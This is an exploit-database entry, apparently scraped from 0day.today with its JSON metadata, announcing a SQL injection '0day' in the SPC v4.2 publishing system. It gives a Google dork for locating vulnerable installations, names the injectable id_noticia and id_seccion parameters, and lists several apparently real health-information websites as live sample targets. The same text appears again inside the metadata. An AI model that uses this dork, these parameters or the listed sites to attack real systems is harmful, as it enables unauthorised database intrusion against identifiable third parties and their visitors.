ID 1337DAY-ID-18451
Type zdt
Reporter Taurus Omar
Modified 2012-06-05T00:00:00
Description
Exploit for php platform in category web applications
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 Taurus Omar From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| C _:_ A | SPC v4.2 - SQL Injection Vulnerability | C _:_ A |
--------------------------------------------------------------------------
==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com
===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : SPC - SQL Injection Vulnerability
Vendor : SPC - Sistemas De Publicacion De Contenido
URL Vendor : www.spc.com.es/
Google Dork : intext:Powered by SPC v4.2 Š
==> EXAMPLE:
http://site.com/frontend/directory/noticia.php?id_noticia=1&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX
http://site.com/frontend/directory/seccion.php?id_seccion=14&PHPSESSID=0bac915a2adcb93cf992XXXXXXX
==> QUIT PARAMETER
&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX
==> EXPLOIT:
http://site.com/frontend/directory/noticia.php?id_noticia=1
http://site.com/frontend/directory/seccion.php?id_seccion=14
==> SAMPLE'S SQLi:
http://www.infohipertension.com/frontend/infohipertension/seccion.php?id_seccion=11
http://www.impotenciamasculina.com/frontend/impotenciamasculina/noticia.php?id_noticia=598
http://www.asmainfantil.com/frontend/asmainfantil/noticia.php?id_noticia=484
http://www.incontinenciaurinaria.com/frontend/incontinenciaurinaria/seccion.php?id_seccion=198
http://www.infoartritis.com/frontend/infoartritis/seccion.php?id_seccion=208
http://www.lacasadelalergico.com/frontend/lacasadelalergico/noticia.php?id_seccion=156&id_noticia=466
MORE IN GOOGLE..
# 0day.today [2018-02-19] #
{"hash": "ceb95c0f8c28dd40ef380a079931941139dacbd864fc909b52e0dc7a85329d49", "id": "1337DAY-ID-18451", "lastseen": "2018-02-19T15:29:10", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "a3716b336925cca458380aa5b089bc75", "key": "href"}, {"hash": "05a0a5bd161dedcbf13067155168e4da", "key": "modified"}, {"hash": "05a0a5bd161dedcbf13067155168e4da", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9288a9de525593c10c50ba5b85ed205f", "key": "reporter"}, {"hash": "f7364d2ce43992f4e21185692aac979e", "key": "sourceData"}, {"hash": "8bd4fcedd2e5677cf2ab6736d6e42d10", "key": "sourceHref"}, {"hash": "86023735138368036592883c7e68f658", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18451", "description": "Exploit for php platform in category web applications", "title": "SPC v4.2 - SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "b9fb3fc2db434d94dcd0044fa7a5e987ce21892cb324c87e8649e65262c22f92", "id": "1337DAY-ID-18451", "lastseen": "2016-04-20T00:03:08", "enchantments": {"score": {"value": 7.3, "modified": "2016-04-20T00:03:08"}}, "hashmap": [{"hash": "05a0a5bd161dedcbf13067155168e4da", "key": "modified"}, {"hash": "4d7c781c21d1e40777d3c21463d441db", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "05a0a5bd161dedcbf13067155168e4da", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "87592bf2c774c457fb89a9a227d75a90", "key": "sourceHref"}, {"hash": "69171d3053bf57913addb50e8821e505", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9288a9de525593c10c50ba5b85ed205f", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "86023735138368036592883c7e68f658", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18451", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "SPC v4.2 - SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": " 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n 0 _ __ __ __ 1\r\n 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n 1 1\r\n 0 [x] Official Website: http://www.1337day.com 0\r\n 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n 0 0\r\n 1 ========================================== 1\r\n 0 Taurus Omar From Inj3ct0r TEAM 1\r\n 1 ========================================== 0\r\n 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n | |\r\n | C _:_ A | SPC v4.2 - SQL Injection Vulnerability | C _:_ A |\r\n --------------------------------------------------------------------------\r\n\r\n==> ABOUT ME:\r\n--- TAURUS OMAR\r\n--- INDEPENDENT SECURITY RESEARCHER\r\n--- ACCESOILEGAL.BLOGSPOT.COM\r\n--- @omartaurus\r\n--- omar-taurus[at]dragonsecurity[dot]org \r\n--- omar-taurus[at]live[dot]com\r\n \r\n===> INFO:\r\nAuthor : TAURUS OMAR\r\nCategory : Webapps / 0day \r\nTitle Exploit : SPC - SQL Injection Vulnerability \r\nVendor : SPC - Sistemas De Publicacion De Contenido \r\nURL Vendor : www.spc.com.es/\r\nGoogle Dork : intext:Powered by SPC v4.2 \u0160 \r\n\r\n\r\n==> EXAMPLE:\r\nhttp://site.com/frontend/directory/noticia.php?id_noticia=1&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX\r\nhttp://site.com/frontend/directory/seccion.php?id_seccion=14&PHPSESSID=0bac915a2adcb93cf992XXXXXXX\r\n\r\n==> QUIT PARAMETER \r\n&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX\r\n\r\n==> EXPLOIT:\r\nhttp://site.com/frontend/directory/noticia.php?id_noticia=1\r\nhttp://site.com/frontend/directory/seccion.php?id_seccion=14\r\n\r\n==> SAMPLE'S SQLi:\r\nhttp://www.infohipertension.com/frontend/infohipertension/seccion.php?id_seccion=11\r\nhttp://www.impotenciamasculina.com/frontend/impotenciamasculina/noticia.php?id_noticia=598\r\nhttp://www.asmainfantil.com/frontend/asmainfantil/noticia.php?id_noticia=484\r\nhttp://www.incontinenciaurinaria.com/frontend/incontinenciaurinaria/seccion.php?id_seccion=198\r\nhttp://www.infoartritis.com/frontend/infoartritis/seccion.php?id_seccion=208\r\nhttp://www.lacasadelalergico.com/frontend/lacasadelalergico/noticia.php?id_seccion=156&id_noticia=466\r\n\r\n\r\nMORE IN GOOGLE..\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2012-06-05T00:00:00", "references": [], "reporter": "Taurus Omar", "modified": "2012-06-05T00:00:00", "href": "http://0day.today/exploit/description/18451"}, "lastseen": "2016-04-20T00:03:08", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": " 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n 0 _ __ __ __ 1\r\n 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n 1 1\r\n 0 [x] Official Website: http://www.1337day.com 0\r\n 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1\r\n 0 0\r\n 1 ========================================== 1\r\n 0 Taurus Omar From Inj3ct0r TEAM 1\r\n 1 ========================================== 0\r\n 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1\r\n | |\r\n | C _:_ A | SPC v4.2 - SQL Injection Vulnerability | C _:_ A |\r\n --------------------------------------------------------------------------\r\n\r\n==> ABOUT ME:\r\n--- TAURUS OMAR\r\n--- INDEPENDENT SECURITY RESEARCHER\r\n--- ACCESOILEGAL.BLOGSPOT.COM\r\n--- @omartaurus\r\n--- omar-taurus[at]dragonsecurity[dot]org \r\n--- omar-taurus[at]live[dot]com\r\n \r\n===> INFO:\r\nAuthor : TAURUS OMAR\r\nCategory : Webapps / 0day \r\nTitle Exploit : SPC - SQL Injection Vulnerability \r\nVendor : SPC - Sistemas De Publicacion De Contenido \r\nURL Vendor : www.spc.com.es/\r\nGoogle Dork : intext:Powered by SPC v4.2 \u0160 \r\n\r\n\r\n==> EXAMPLE:\r\nhttp://site.com/frontend/directory/noticia.php?id_noticia=1&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX\r\nhttp://site.com/frontend/directory/seccion.php?id_seccion=14&PHPSESSID=0bac915a2adcb93cf992XXXXXXX\r\n\r\n==> QUIT PARAMETER \r\n&PHPSESSID=5403f3b20e75d73adcb0XXXXXXX\r\n\r\n==> EXPLOIT:\r\nhttp://site.com/frontend/directory/noticia.php?id_noticia=1\r\nhttp://site.com/frontend/directory/seccion.php?id_seccion=14\r\n\r\n==> SAMPLE'S SQLi:\r\nhttp://www.infohipertension.com/frontend/infohipertension/seccion.php?id_seccion=11\r\nhttp://www.impotenciamasculina.com/frontend/impotenciamasculina/noticia.php?id_noticia=598\r\nhttp://www.asmainfantil.com/frontend/asmainfantil/noticia.php?id_noticia=484\r\nhttp://www.incontinenciaurinaria.com/frontend/incontinenciaurinaria/seccion.php?id_seccion=198\r\nhttp://www.infoartritis.com/frontend/infoartritis/seccion.php?id_seccion=208\r\nhttp://www.lacasadelalergico.com/frontend/lacasadelalergico/noticia.php?id_seccion=156&id_noticia=466\r\n\r\n\r\nMORE IN GOOGLE..\r\n\r\n\n\n# 0day.today [2018-02-19] #", "published": "2012-06-05T00:00:00", "references": [], "reporter": "Taurus Omar", "modified": "2012-06-05T00:00:00", "href": "https://0day.today/exploit/description/18451"}
{"result": {}}
